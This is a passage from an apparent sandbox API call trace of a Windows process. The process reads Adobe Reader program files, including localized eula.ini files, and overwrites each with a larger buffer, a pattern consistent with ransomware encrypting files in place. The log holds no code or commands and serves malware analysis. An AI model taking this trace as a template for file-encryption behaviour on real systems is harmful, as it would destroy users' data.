[0066.736] CloseHandle (hObject=0x1cc) returned 1 [0066.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.739] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.739] ReleaseMutex (hMutex=0x168) returned 1 [0066.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.EUQ", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.EUQ", lpUsedDefaultChar=0x0) returned 11 [0066.739] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.741] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.741] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.741] CloseHandle (hObject=0x1cc) returned 1 [0066.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.745] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.745] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.745] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.745] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.745] ReleaseMutex (hMutex=0x168) returned 1 [0066.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NOR", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.NOR", lpUsedDefaultChar=0x0) returned 11 [0066.746] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.750] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.750] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.751] CloseHandle (hObject=0x1cc) returned 1 [0066.756] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.757] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.758] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.758] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.758] ReleaseMutex (hMutex=0x168) returned 1 [0066.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SVE", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SVE", lpUsedDefaultChar=0x0) returned 11 [0066.758] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.760] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.761] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.761] CloseHandle (hObject=0x1cc) returned 1 [0066.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.766] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.766] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d8 [0066.767] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.767] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.767] ReleaseMutex (hMutex=0x168) returned 1 [0066.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0066.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0066.767] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d8, lpOverlapped=0x0) returned 1 [0066.768] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.768] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x345f2d0*=0x760, lpOverlapped=0x0) returned 1 [0066.769] CloseHandle (hObject=0x1cc) returned 1 [0066.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x524 [0066.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.773] ReleaseMutex (hMutex=0x168) returned 1 [0066.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0066.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0066.773] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3c368, nNumberOfBytesToRead=0x524, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3c368*, lpNumberOfBytesRead=0x345f2bc*=0x524, lpOverlapped=0x0) returned 1 [0066.932] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.932] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xaac, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xaac, lpOverlapped=0x0) returned 1 [0066.933] CloseHandle (hObject=0x1cc) returned 1 [0066.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.935] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.935] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4d8 [0066.935] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.935] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.935] ReleaseMutex (hMutex=0x168) returned 1 [0066.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0066.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0066.936] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4d8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x345f2bc*=0x4d8, lpOverlapped=0x0) returned 1 [0067.004] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0067.004] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa60, lpOverlapped=0x0) returned 1 [0067.005] CloseHandle (hObject=0x1cc) returned 1 [0067.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.006] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.006] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x298 [0067.006] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.007] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.007] ReleaseMutex (hMutex=0x168) returned 1 [0067.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.007] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x298, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x345f2bc*=0x298, lpOverlapped=0x0) returned 1 [0067.008] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0067.008] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x345f2d0*=0x820, lpOverlapped=0x0) returned 1 [0067.008] CloseHandle (hObject=0x1cc) returned 1 [0067.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x470 [0067.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.010] ReleaseMutex (hMutex=0x168) returned 1 [0067.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.010] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x470, lpOverlapped=0x0) returned 1 [0067.015] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0067.015] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9f8, lpOverlapped=0x0) returned 1 [0067.015] CloseHandle (hObject=0x1cc) returned 1 [0067.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x478 [0067.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.021] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.022] ReleaseMutex (hMutex=0x168) returned 1 [0067.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.022] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x345f2bc*=0x478, lpOverlapped=0x0) returned 1 [0067.029] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0067.029] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa00, lpOverlapped=0x0) returned 1 [0067.029] CloseHandle (hObject=0x1cc) returned 1 [0067.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.032] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.033] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41e [0067.033] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.033] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.033] ReleaseMutex (hMutex=0x168) returned 1 [0067.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.033] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x41e, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x41e, lpOverlapped=0x0) returned 1 [0067.042] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0067.042] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a6, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9a6, lpOverlapped=0x0) returned 1 [0067.042] CloseHandle (hObject=0x1cc) returned 1 [0067.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\brdlang32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.057] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.057] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3800 [0067.057] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.058] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.058] ReleaseMutex (hMutex=0x168) returned 1 [0067.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CAT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CAT", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.CAT", lpUsedDefaultChar=0x0) returned 13 [0067.058] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.071] 